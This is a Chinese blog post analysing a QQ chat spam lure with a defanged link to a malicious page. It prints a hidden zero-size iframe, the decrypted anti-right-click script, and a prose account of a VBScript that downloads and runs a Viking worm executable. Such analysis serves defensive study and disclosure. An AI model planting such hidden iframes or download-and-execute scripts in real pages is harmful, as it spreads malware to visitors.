endurer 原创
2006-09-26 第 1版
2006-09-26 第 1版
QQ自动发送的信息为:
/-------
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了?
hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***382/
-------/
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了?
hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***382/
-------/
点击该链接打开的网页(瑞星报为:
Trojan.DL.VBS.Agent.t,
http://viruslist.rising.com.cn/viruslist.asp?id=309960)中包含两段需要注意的代码段。
代码段1:
/-------
<iframe src=hxxp://web2***.%33%39%63%6F***%6D%2E%6F%72%67/m***s/mm***.htm width=0 height=0></iframe>
-------/
mm***.htm 的开头为 HTMLShip 加密的脚本程序,分为两个部分:
前一部分 解密后的代码为JavaScript编写,如下:
/-------
<script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script>
-------/
/-------
<script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script>
-------/
用来阻止用户选择网页内容、屏蔽右键关键菜单等。
后一部分 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web2.3***9com.org/m***s/mm*2.exe 保存为 %temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
Kaspersky 报为
Worm.Win32.Viking.y(
http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y)
瑞星报为
Worm.Viking.cx。
代码段2:
为加密的脚本程序,同样分为两个部分:
前一部分 解密后的代码为JavaScript编写,如下:
/-------
<script language=javascript>gV65=9230;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};vN33=6942;lL98=943;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();sB12=370;rT69=7803;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();qH28=8945;sK41=4086;iV46=6945;uB93=8085;tO53=9227;jM18=3229;zW23=6087;;_licensed_to_="TEAM iPA";</script>
-------/
/-------
<script language=javascript>gV65=9230;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};vN33=6942;lL98=943;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();sB12=370;rT69=7803;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();qH28=8945;sK41=4086;iV46=6945;uB93=8085;tO53=9227;jM18=3229;zW23=6087;;_licensed_to_="TEAM iPA";</script>
-------/
后一部分 解密后为HTML代码:
/-------
<iframe width="760" height="1830" src="hxxp://u.7town.com/html/760_1830/ly**1/index.html?uid=1540***7&a=&b=&c=&d=&e=&f=" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
-------/
/-------
<iframe width="760" height="1830" src="hxxp://u.7town.com/html/760_1830/ly**1/index.html?uid=1540***7&a=&b=&c=&d=&e=&f=" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>
-------/
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
